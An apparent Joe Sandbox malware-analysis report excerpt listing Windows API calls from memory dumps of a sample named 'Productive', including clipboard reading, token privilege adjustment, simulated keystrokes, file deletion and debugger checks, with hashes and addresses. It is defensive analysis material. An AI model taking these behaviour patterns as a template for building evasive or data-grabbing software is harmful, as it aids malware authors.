                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 9b058758a0d786c0588ec70bdb02b7a55e56c32e3e02b8b630832ef8a57f5885
                                                                                                                                                                • Instruction ID: 5032e4a832a658b6926bc2de0841dd6b135a5736e1a1dffd0a9bf566dd1ea72e
                                                                                                                                                                • Opcode Fuzzy Hash: 9b058758a0d786c0588ec70bdb02b7a55e56c32e3e02b8b630832ef8a57f5885
                                                                                                                                                                • Instruction Fuzzy Hash: A0B09239100700569D2E1E3C19680D93305584B3A9BDA1B81E878896E29639988BA560
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,002D32DA,002D1003,?,002D9EEE,000000FF,0000001E,0036CE28,00000008,002D9E52,002D1003,002D1003), ref: 002D32AA
                                                                                                                                                                  • Part of subcall function 002D329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 002D32BC
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 002D32DE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressExitHandleModuleProcProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 75539706-0
                                                                                                                                                                • Opcode ID: fd5463ac72dca90c139e8ddb0e63de7fa8db215045587847cbc9e12dec258782
                                                                                                                                                                • Instruction ID: 923bb9b2cd22adb145c044b232cb752d13a9dd41c669d2aab95210e62d3ea7a6
                                                                                                                                                                • Opcode Fuzzy Hash: fd5463ac72dca90c139e8ddb0e63de7fa8db215045587847cbc9e12dec258782
                                                                                                                                                                • Instruction Fuzzy Hash: F1B09234000208BBCB462F11DC0E84C3F29FB01B90B004021FD0408131DFB2AEA29A91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00314005: FindFirstFileW.KERNEL32(?,?), ref: 0031407C
                                                                                                                                                                  • Part of subcall function 00314005: DeleteFileW.KERNEL32(?,?,?,?), ref: 003140CC
                                                                                                                                                                  • Part of subcall function 00314005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003140DD
                                                                                                                                                                  • Part of subcall function 00314005: FindClose.KERNEL32(00000000), ref: 003140F4
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0031C292
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2191629493-0
                                                                                                                                                                • Opcode ID: c92d7d92fd18e723741eefe2f704d4ce1437de1584b12fd738f9b87d3787a981
                                                                                                                                                                • Instruction ID: 560b5c0a9429f03508c70742d7603315853e996e86ef69cec2fbed4d77ac1eb1
                                                                                                                                                                • Opcode Fuzzy Hash: c92d7d92fd18e723741eefe2f704d4ce1437de1584b12fd738f9b87d3787a981
                                                                                                                                                                • Instruction Fuzzy Hash: C7F082352202104FCB15EF59D840F99B7E5AF48760F058419F9458B352CB70BC51CB94
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 002D33BA
                                                                                                                                                                  • Part of subcall function 002DA754: EncodePointer.KERNEL32(002DA720,0036CE68,00000008,002E4D3C), ref: 002DA759
                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002DA0D0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002DA0E4
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002DA0F7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002DA10A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002DA11D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002DA130
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002DA143
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002DA156
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002DA169
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002DA17C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002DA18F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002DA1A2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002DA1B5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002DA1C8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002DA1DB
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002DA1EE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 002DA201
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 002DA214
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 002DA227
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 002DA23A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 002DA24D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002DA260
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 002DA273
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 002DA286
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 002DA299
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 002DA2AC
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 002DA2BF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 002DA2D2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 002DA2E5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 002DA2F8
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 002DA30B
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 002DA31E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleExW), ref: 002DA331
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandleW), ref: 002DA344
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$EncodePointer$HandleModule
                                                                                                                                                                • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetFileInformationByHandleExW$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTickCount64$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetFileInformationByHandleW$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                                                                                                                                                • API String ID: 2375030495-2934716456
                                                                                                                                                                • Opcode ID: c05ea4ed6c5e6ca6e9eac63317798ff462795a7a4d513b34c79e9e23f4abf2bd
                                                                                                                                                                • Instruction ID: 461357b8144de2c2eb8f4c9174b87c35b4867770e64eceb993d714b18a08096e
                                                                                                                                                                • Opcode Fuzzy Hash: c05ea4ed6c5e6ca6e9eac63317798ff462795a7a4d513b34c79e9e23f4abf2bd
                                                                                                                                                                • Instruction Fuzzy Hash: 2A61B771950718AA87279FF5AC56E5BBFFCBB56B00F44082EE508D6172E6B4B0808F50
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B29E2: GetWindowLongW.USER32(?,000000EB), ref: 002B29F3
                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0033D208
                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033D249
                                                                                                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0033D28E
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033D2B8
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D2E1
                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0033D37A
                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0033D387
                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0033D39D
                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0033D3A7
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0033D3D0
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D3F7
                                                                                                                                                                • SendMessageW.USER32(?,00001030,?,0033B9BA), ref: 0033D4FD
                                                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0033D513
                                                                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0033D526
                                                                                                                                                                • SetCapture.USER32(?), ref: 0033D52F
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0033D594
                                                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0033D5A1
                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0033D5BB
                                                                                                                                                                • ReleaseCapture.USER32 ref: 0033D5C6
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0033D600
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0033D60D
                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033D669
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D697
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D6D4
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D703
                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0033D724
                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0033D733
                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0033D753
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0033D760
                                                                                                                                                                • GetParent.USER32(?), ref: 0033D780
                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0033D7E9
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D81A
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0033D878
                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0033D8A8
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0033D8D2
                                                                                                                                                                • SendMessageW.USER32 ref: 0033D8F5
                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0033D947
                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0033D97B
                                                                                                                                                                  • Part of subcall function 002B29AB: GetWindowLongW.USER32(?,000000EB), ref: 002B29BC
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0033DA17
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                • API String ID: 3429851547-4164748364
                                                                                                                                                                • Opcode ID: 664803388fa06a8201b470730fb54acc3ff5efd6941e6404c33acfd1d6a91f55
                                                                                                                                                                • Instruction ID: dd2948f58e5618807b1b50cc7b19579dcd9f249c28171118f9f33f5d0acbdc45
                                                                                                                                                                • Opcode Fuzzy Hash: 664803388fa06a8201b470730fb54acc3ff5efd6941e6404c33acfd1d6a91f55
                                                                                                                                                                • Instruction Fuzzy Hash: 7542C034604341AFD726CF28D884FAABBE9FF49350F150619F6998B2A1CB71E854CF52
                                                                                                                                                                APIs
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00375388,00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5CD4
                                                                                                                                                                • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000800,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5CFA
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D06
                                                                                                                                                                • LoadLibraryExW.KERNEL32(USER32.DLL,00000000,00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D1C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 002E5D32
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D41
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 002E5D4E
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D55
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 002E5D62
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D69
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 002E5D76
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D7D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 002E5D8E
                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D95
                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5D9F
                                                                                                                                                                • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5DB1
                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5DCF
                                                                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5DF1
                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5DFC
                                                                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5E41
                                                                                                                                                                • DecodePointer.KERNEL32(00000000,?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5E59
                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,002DA53D,00375388,Microsoft Visual C++ Runtime Library,00012010), ref: 002E5E6D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Pointer$DecodeEncode$AddressProc$LibraryLoad$DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                                • API String ID: 3166169540-564504941
                                                                                                                                                                • Opcode ID: 85fa7b7c697dd8c96e9044a85a955315dba5304254b809cdc8f7981df3269fd8
                                                                                                                                                                • Instruction ID: 2dc7ee71dd1dce000c36983a4844962af9e5532cceb096cda80f8b7cf841224c
                                                                                                                                                                • Opcode Fuzzy Hash: 85fa7b7c697dd8c96e9044a85a955315dba5304254b809cdc8f7981df3269fd8
                                                                                                                                                                • Instruction Fuzzy Hash: 9551DF34A60B67ABCB229FB69C89AAE7BFCAF44744F580418F509E3150DB70DD50CB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32(00000000,?), ref: 002C5EE2
                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003010D7
                                                                                                                                                                • IsIconic.USER32(?), ref: 003010E0
                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 003010ED
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 003010F7
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0030110D
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00301114
                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00301120
                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00301131
                                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00301139
                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00301141
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00301144
                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00301159
                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00301164
                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0030116E
                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00301173
                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0030117C
                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00301181
                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0030118B
                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00301190
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00301193
                                                                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 003011BA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                                                                • Opcode ID: 1a10bd2c0fcf1f1952379d4f3810a304a6eae0a41949a913722fb7c1442f8338
                                                                                                                                                                • Instruction ID: 4317c03e11a70d793209c7b1b04b5e4780bbb21b59652b60fb19cf2809b9c28a
                                                                                                                                                                • Opcode Fuzzy Hash: 1a10bd2c0fcf1f1952379d4f3810a304a6eae0a41949a913722fb7c1442f8338
                                                                                                                                                                • Instruction Fuzzy Hash: 9931A375B40318BBEB262B619C49F7F3F6CEB45B50F114055FB05AA1D0CAB06D50AEA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00309399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003093E3
                                                                                                                                                                  • Part of subcall function 00309399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00309410
                                                                                                                                                                  • Part of subcall function 00309399: GetLastError.KERNEL32 ref: 0030941D
                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00308FC3
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00308FD4
                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00308FEB
                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 00309004
                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 0030900E
                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00309028
                                                                                                                                                                  • Part of subcall function 00308DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00308F27), ref: 00308DFE
                                                                                                                                                                  • Part of subcall function 00308DE9: CloseHandle.KERNEL32(?,?,00308F27), ref: 00308E10
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue
                                                                                                                                                                • String ID: $default$winsta0
                                                                                                                                                                • API String ID: 3576815822-1027155976
                                                                                                                                                                • Opcode ID: c94bbf8e877add1fbfeb5c1deee14b20af88445fc8f78cabe0ea2ba963cc8f2c
                                                                                                                                                                • Instruction ID: 86d79647716e675fc135ac53a4f1fec89e7416551636eee169d270e9b59d046c
                                                                                                                                                                • Opcode Fuzzy Hash: c94bbf8e877add1fbfeb5c1deee14b20af88445fc8f78cabe0ea2ba963cc8f2c
                                                                                                                                                                • Instruction Fuzzy Hash: 5181AA75A0220AFFDF169FA0CC58AEE7B79EF05304F05411AF911A62A2DB319E15DF20
                                                                                                                                                                APIs
                                                                                                                                                                • OpenClipboard.USER32(00340980), ref: 0032465C
                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0032466A
                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 00324672
                                                                                                                                                                • CloseClipboard.USER32 ref: 0032467E
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0032469A
                                                                                                                                                                • CloseClipboard.USER32 ref: 003246A4
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 003246B9
                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 003246C6
                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 003246CE
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 003246DB
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0032470F
                                                                                                                                                                • CloseClipboard.USER32 ref: 0032481F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
